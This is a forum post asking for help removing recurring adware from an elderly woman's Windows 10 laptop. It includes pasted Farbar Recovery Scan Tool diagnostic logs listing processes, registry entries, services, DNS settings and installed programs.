Jump to content

Malware/adware keeps returning


Recommended Posts

Hello, and thank you in advance. I tutor an older woman in a nursing home on PC use and she is having Adware problems on her PC. I offered to help her remove it, she gets so much joy from her PC! But I'm stuck, no matter what I do it comes back and leaves her PC unusable. I have pasted the FRST logs here and attached the first two Malwarbyes logs. I also reset all the browsers on her machine after the second scan, to no avail.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01 Ran by bbabq (administrator) on DESKTOP-N1B6HJU (03-04-2016 13:41:28) Running from C:\Users\bbabq\Desktop Loaded Profiles: bbabq & (Available Profiles: bbabq) Platform: Windows 10 Home Version 1511 (X64) Language: English (United States) Internet Explorer Version 11 (Default browser: FF) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (AMD) C:\Windows\System32\atiesrxx.exe (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\tbaseprovisioning.exe (Microsoft Corporation) C:\Windows\System32\wlanext.exe (Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe () C:\Program Files\AVAST Software\SecureLine\vpnsvc.exe () C:\Program Files\CyberLink\Shared files\RichVideo64.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe (AMD) C:\Windows\System32\atieclxx.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe (Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe (Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe (Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (MyHeritage) C:\Program Files (x86)\MyHeritage\Bin\FTBCheckUpdates.exe (CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam6\YouCamService6.exe (AVAST Software) C:\Program Files\AVAST Software\SecureLine\secureline.exe (Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe (TeamViewer GmbH) C:\Users\bbabq\AppData\Local\Temp\TeamViewer\TeamViewer_2016-04-03-10-38-30.exe (Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe (TeamViewer GmbH) C:\Users\bbabq\AppData\Local\Temp\TeamViewer\TeamViewer_Desktop.exe () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe (Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8843520 2016-04-02] (Realtek Semiconductor) HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3945656 2016-01-27] (Synaptics Incorporated) HKLM-x32\...\Run: [StartCCC] => c:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-08-07] (Advanced Micro Devices, Inc.) HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe [654088 2015-02-17] (Hewlett-Packard Development Company, L.P.) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595480 2016-03-20] (Oracle Corporation) HKLM-x32\...\Run: [PowerDVD14Agent] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe [795336 2016-01-29] (CyberLink Corp.) HKLM-x32\...\Run: [Family Tree Builder Update] => C:\Program Files (x86)\MyHeritage\Bin\FTBCheckUpdates.exe [14174928 2016-03-22] (MyHeritage) HKU\S-1-5-21-1042049586-4185267109-2020147840-1002\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50615936 2016-01-19] (Skype Technologies S.A.) HKU\S-1-5-21-1042049586-4185267109-2020147840-1002\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.) HKU\S-1-5-21-1042049586-4185267109-2020147840-1002\...\RunOnce: [Uninstall C:\Users\bbabq\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\bbabq\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64" HKU\S-1-5-21-1042049586-4185267109-2020147840-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50615936 2016-01-19] (Skype Technologies S.A.) HKU\S-1-5-21-1042049586-4185267109-2020147840-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.) HKU\S-1-5-21-1042049586-4185267109-2020147840-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\RunOnce: [Uninstall C:\Users\bbabq\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\bbabq\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64" BootExecute: autocheck autochk * sdnclean64.exe ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) ProxyEnable: [S-1-5-20] => Proxy is enabled. ProxyServer: [S-1-5-20] => http=localhost:56668; ProxyEnable: [S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0] => Proxy is enabled. ProxyServer: [S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0] => http=localhost:56668; Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 205.171.2.25 Tcpip\Parameters: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{2a968ed2-a93b-45f7-bcb6-a1d435494652}: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{2a968ed2-a93b-45f7-bcb6-a1d435494652}: [DhcpNameServer] 82.163.142.7 Tcpip\..\Interfaces\{a3ba1a2f-f0eb-4605-a4f8-f1759421390a}: [NameServer] 82.163.142.7 95.211.158.134,8.8.8.8,8.8.4.4 Tcpip\..\Interfaces\{a3ba1a2f-f0eb-4605-a4f8-f1759421390a}: [DhcpNameServer] 192.168.0.1 205.171.2.25 Tcpip\..\Interfaces\{e5783318-d6a8-4ace-8b4c-81b2b72b4cc6}: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{e5783318-d6a8-4ace-8b4c-81b2b72b4cc6}: [DhcpNameServer] 82.163.142.7 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_dnldstr_16_04¶m1=1¶m2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0F0CtA0F0D0BtAzz0FyE0F0A0Czzzz0EtN0D0Tzu0StCyEzzyBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2StA0ByDtCyEyEyE0FtGtBtAyByCtGyBtByDtDtGtB0D0AyEtGtA0BtCyEtD0FyE0F0BzyyCyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0ByB0CyBzytCtDyBtGyD0EtAtCtGyEtBtBzztGzytB0F0CtGtBtAyDyCyC0A0EyE0CtD0FtB2QtN0A0LzuyE%26cr%3D1179455443%26a%3Dwncy_dnldstr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE HKU\S-1-5-21-1042049586-4185267109-2020147840-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE HKU\S-1-5-21-1042049586-4185267109-2020147840-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = SearchScopes: HKLM-x32 -> {E28C3100-2907-479E-BD5C-519AA0C7EED6} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms} SearchScopes: HKU\S-1-5-21-1042049586-4185267109-2020147840-1002 -> {E28C3100-2907-479E-BD5C-519AA0C7EED6} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms} SearchScopes: HKU\S-1-5-21-1042049586-4185267109-2020147840-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {E28C3100-2907-479E-BD5C-519AA0C7EED6} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms} BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\ssv.dll [2016-04-02] (Oracle Corporation) BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2015-04-30] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\jp2ssv.dll [2016-04-02] (Oracle Corporation) BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-02-25] (HP) Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - No File FireFox: ======== FF ProfilePath: C:\Users\bbabq\AppData\Roaming\Mozilla\Firefox\Profiles\txalcbov.default-1459625056742 FF DefaultSearchEngine.US: Google FF Homepage: google.com FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_21_0_0_197.dll [2016-03-23] () FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_21_0_0_197.dll [2016-03-23] () FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1223183.dll [2015-12-21] (Adobe Systems, Inc.) FF Plugin-x32: @java.com/DTPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\dtplugin\npDeployJava1.dll [2016-04-02] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\plugin2\npjp2.dll [2016-04-02] (Oracle Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-18] (Adobe Systems Inc.) FF Extension: LastPass - C:\Users\bbabq\AppData\Roaming\Mozilla\Firefox\Profiles\txalcbov.default-1459625056742\extensions\support@lastpass.com [2016-04-02] FF Extension: NoScript - C:\Users\bbabq\AppData\Roaming\Mozilla\Firefox\Profiles\txalcbov.default-1459625056742\extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi [2016-04-03] FF Extension: WOT - C:\Users\bbabq\AppData\Roaming\Mozilla\Firefox\Profiles\txalcbov.default-1459625056742\extensions\{a0d7ccb3-214d-498b-b4aa-0e8fda9a7bf7} [2016-04-03] FF Extension: Adblock Plus - C:\Users\bbabq\AppData\Roaming\Mozilla\Firefox\Profiles\txalcbov.default-1459625056742\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-04-02] FF Extension: Default - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi [2016-03-25] [not signed] Chrome: ======= CHR DefaultSearchKeyword: Default -> lp CHR Profile: C:\Users\bbabq\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Docs) - C:\Users\bbabq\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-04-02] CHR Extension: (Google Drive) - C:\Users\bbabq\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-04-02] CHR Extension: (YouTube) - C:\Users\bbabq\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-04-02] CHR Extension: (Google Docs Offline) - C:\Users\bbabq\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-02] CHR Extension: (AdBlock) - C:\Users\bbabq\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-04-02] CHR Extension: (LastPass: Free Password Manager) - C:\Users\bbabq\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2016-04-02] CHR Extension: (Chrome Web Store Payments) - C:\Users\bbabq\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02] CHR Extension: (Gmail) - C:\Users\bbabq\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-04-02] ==================== Services (Whitelisted) ======================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S2 AdaptiveSleepService; c:\Program Files\ATI Technologies\ATI.ACE\A4\AdaptiveSleepService.exe [138752 2015-08-06] () [File not signed] R2 AMD FUEL Service; c:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [344064 2015-08-06] (Advanced Micro Devices, Inc.) [File not signed] S2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.) R2 HPSupportSolutionsFrameworkService; c:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [26680 2016-02-18] (Hewlett-Packard Company) R2 HPWMISVC; c:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe [608520 2015-02-17] (Hewlett-Packard Development Company, L.P.) S2 Kingsoft_WPS_UpdateService; C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsupdatesvr.exe [133480 2015-12-01] (Zhuhai Kingsoft Office Software Co.,Ltd) R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes) R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes) S3 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [863448 2015-12-03] (McAfee, Inc.) S3 McAWFwk; C:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [338208 2015-03-19] (McAfee, Inc.) S2 mcbootdelaystartsvc; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.) S2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.8.203.0\McCSPServiceHost.exe [1694152 2015-12-02] (McAfee, Inc.) S4 McNaiAnn; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.) S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [679120 2015-10-20] (McAfee, Inc.) S3 McProxy; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.) S3 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.) R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [389896 2014-04-14] () R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [310016 2016-04-02] (Realtek Semiconductor) R2 SecureLine; C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe [465088 2016-03-01] () R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2016-01-27] (Synaptics Incorporated) R2 tbaseprovisioning; C:\Windows\SysWOW64\tbaseprovisioning.exe [60432 2015-08-18] (Advanced Micro Devices, Inc.) R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation) R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation) S2 mfemms; "C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe" [X] S2 TrezaaService; "C:\Program Files (x86)\Trezaa\Trezaa.Service.exe" [X] ===================== Drivers (Whitelisted) ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R3 AmdAS4; C:\Windows\System32\drivers\AmdAS4.sys [18968 2015-08-18] (Advanced Micro Devices, INC.) S3 amdkmcsp; C:\Windows\system32\DRIVERS\amdkmcsp.sys [101104 2015-08-18] (Advanced Micro Devices, Inc. ) R0 amdkmpfd; C:\Windows\System32\drivers\amdkmpfd.sys [82704 2015-08-18] (Advanced Micro Devices, Inc.) R0 amdpsp; C:\Windows\System32\DRIVERS\amdpsp.sys [277240 2015-08-18] (Advanced Micro Devices, Inc. ) R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [102912 2015-08-18] (Advanced Micro Devices) R3 clwvd6; C:\Windows\system32\DRIVERS\clwvd6.sys [41704 2013-10-29] (CyberLink Corporation) S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [207208 2015-05-19] (McAfee, Inc.) R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes) R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-04-03] (Malwarebytes) R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation) S2 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [415976 2015-09-23] (McAfee, Inc.) S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109480 2015-10-06] (McAfee, Inc.) R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [895256 2015-06-18] (Realtek ) S3 RTSUER; C:\Windows\system32\Drivers\RtsUer.sys [411712 2015-05-21] (Realsil Semiconductor Corporation) R3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [4738672 2016-02-06] (Realtek Semiconductor Corporation ) R3 SmbDrv; C:\Windows\system32\DRIVERS\Smb_driver_AMDASF.sys [42184 2016-01-27] (Synaptics Incorporated) S3 SmbDrvI; C:\Windows\System32\drivers\Smb_driver_Intel.sys [33960 2015-07-13] (Synaptics Incorporated) S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation) R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation) R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation) R3 WirelessButtonDriver64; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [30384 2015-06-23] (HP Inc.) ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-04-03 13:41 - 2016-04-03 13:42 - 00019553 _____ C:\Users\bbabq\Desktop\FRST.txt 2016-04-03 13:41 - 2016-04-03 13:41 - 00000000 ____D C:\FRST 2016-04-03 13:37 - 2016-04-03 13:40 - 02374144 _____ (Farbar) C:\Users\bbabq\Desktop\FRST64.exe 2016-04-03 13:23 - 2016-04-03 13:23 - 00000085 _____ C:\WINDOWS\wininit.ini 2016-04-03 13:20 - 2016-04-03 13:20 - 00004143 _____ C:\Users\bbabq\Documents\4-2 Malwarebytes Scan.txt 2016-04-03 13:12 - 2016-04-03 13:12 - 00016061 _____ C:\Users\bbabq\Documents\Spybot Scan Results.160403-1311.txt 2016-04-03 12:36 - 2016-04-03 12:36 - 00026745 _____ C:\Users\bbabq\Documents\First log Malware Bytes.txt 2016-04-03 12:00 - 2016-04-03 12:00 - 00000000 ____D C:\ProgramData\7a9cc0ea-47d1-0 2016-04-03 12:00 - 2016-04-03 12:00 - 00000000 ____D C:\ProgramData\7a9cc0ea-3fa3-1 2016-04-03 11:57 - 2016-04-03 11:57 - 00001047 _____ C:\Users\bbabq\Documents\malwarebytes.txt 2016-04-03 11:52 - 2016-04-03 13:23 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy 2016-04-03 11:52 - 2016-04-03 11:52 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking 2016-04-03 11:51 - 2016-04-03 13:23 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2 2016-04-03 11:48 - 2016-04-03 11:49 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\bbabq\Downloads\spybot-2.4.exe 2016-04-03 10:46 - 2016-04-03 10:46 - 02085168 _____ C:\Users\bbabq\Downloads\Adaware_Installer.exe 2016-04-02 19:55 - 2016-04-02 19:59 - 22851472 _____ (Malwarebytes ) C:\Users\bbabq\Downloads\mbam-setup-web.NT-2.2.1.1043.exe 2016-04-02 14:12 - 2016-04-02 14:12 - 00621299 _____ C:\Users\bbabq\Downloads\150100.pdf 2016-04-02 13:24 - 2016-04-02 13:24 - 00000000 ____D C:\Users\bbabq\Desktop\Old Firefox Data 2016-04-02 10:50 - 2016-04-02 11:04 - 00000000 ____D C:\Users\bbabq\Documents\MyHeritage 2016-04-02 10:49 - 2016-04-02 10:49 - 00000000 ____D C:\Users\bbabq\AppData\Roaming\The Complete Genealogy Reporter - FTB 2016-04-02 10:49 - 2016-04-02 10:49 - 00000000 ____D C:\Users\bbabq\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MyHeritage.com 2016-04-02 10:49 - 2012-08-02 08:56 - 00606208 _____ (Lorenzi Davide) C:\WINDOWS\SysWOW64\HexUniRTFBox.ocx 2016-04-02 10:49 - 2010-06-17 19:49 - 02029056 _____ (Bytescout) C:\WINDOWS\SysWOW64\PDFDocScout.DLL 2016-04-02 10:49 - 2004-12-07 11:11 - 00258352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\unicows.dll 2016-04-02 10:49 - 2003-07-06 14:07 - 00372736 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\ijl15.dll 2016-04-02 10:49 - 2002-03-07 01:19 - 00454656 _____ () C:\WINDOWS\SysWOW64\PaintX.dll 2016-04-02 10:49 - 2000-05-22 17:58 - 00608448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.ocx 2016-04-02 10:49 - 2000-03-14 00:00 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSSTDFMT.DLL 2016-04-02 10:49 - 1998-06-24 01:00 - 00137000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmapi32.ocx 2016-04-02 10:48 - 2016-04-02 11:03 - 00000000 ____D C:\ProgramData\MyHeritage 2016-04-02 10:48 - 2016-04-02 10:57 - 00000000 ____D C:\Users\bbabq\AppData\Roaming\MyHeritage 2016-04-02 10:47 - 2016-04-02 10:48 - 00000000 ____D C:\Program Files (x86)\MyHeritage 2016-04-02 10:37 - 2016-04-02 10:37 - 00001863 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DTS Audio Control Panel.lnk 2016-04-02 10:36 - 2016-04-02 10:37 - 00000000 ____D C:\WINDOWS\LastGood 2016-04-02 10:36 - 2016-04-02 10:34 - 01943624 _____ (DTS, Inc.) C:\WINDOWS\system32\sltech64.dll 2016-04-02 10:36 - 2016-04-02 10:34 - 01435152 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRRPTR64.dll 2016-04-02 10:36 - 2016-04-02 10:34 - 01022872 _____ (DTS, Inc.) C:\WINDOWS\system32\sl3apo64.dll 2016-04-02 10:36 - 2016-04-02 10:34 - 00532384 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSX64.dll 2016-04-02 10:36 - 2016-04-02 10:34 - 00467160 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRAPO64.dll 2016-04-02 10:36 - 2016-04-02 10:34 - 00381408 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM64.dll 2016-04-02 10:36 - 2016-04-02 10:34 - 00341160 _____ (Synopsys, Inc.) C:\WINDOWS\SysWOW64\SRCOM.dll 2016-04-02 10:36 - 2016-04-02 10:34 - 00341160 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM.dll 2016-04-02 10:36 - 2016-04-02 10:34 - 00258504 _____ (TODO:

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01 Ran by bbabq (2016-04-03 13:43:36) Running from C:\Users\bbabq\Desktop Windows 10 Home Version 1511 (X64) (2016-01-29 11:36:51) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-1042049586-4185267109-2020147840-500 - Administrator - Disabled) bbabq (S-1-5-21-1042049586-4185267109-2020147840-1002 - Administrator - Enabled) => C:\Users\bbabq DefaultAccount (S-1-5-21-1042049586-4185267109-2020147840-503 - Limited - Disabled) Guest (S-1-5-21-1042049586-4185267109-2020147840-501 - Limited - Disabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: McAfee Anti-Virus and Anti-Spyware (Disabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Spybot - Search and Destroy (Disabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0} AS: McAfee Anti-Virus and Anti-Spyware (Disabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB} FW: McAfee Firewall (Disabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.010.20060 - Adobe Systems Incorporated) Adobe Flash Player 21 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 21.0.0.197 - Adobe Systems Incorporated) Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.3.183 - Adobe Systems, Inc.) Amazon Kindle 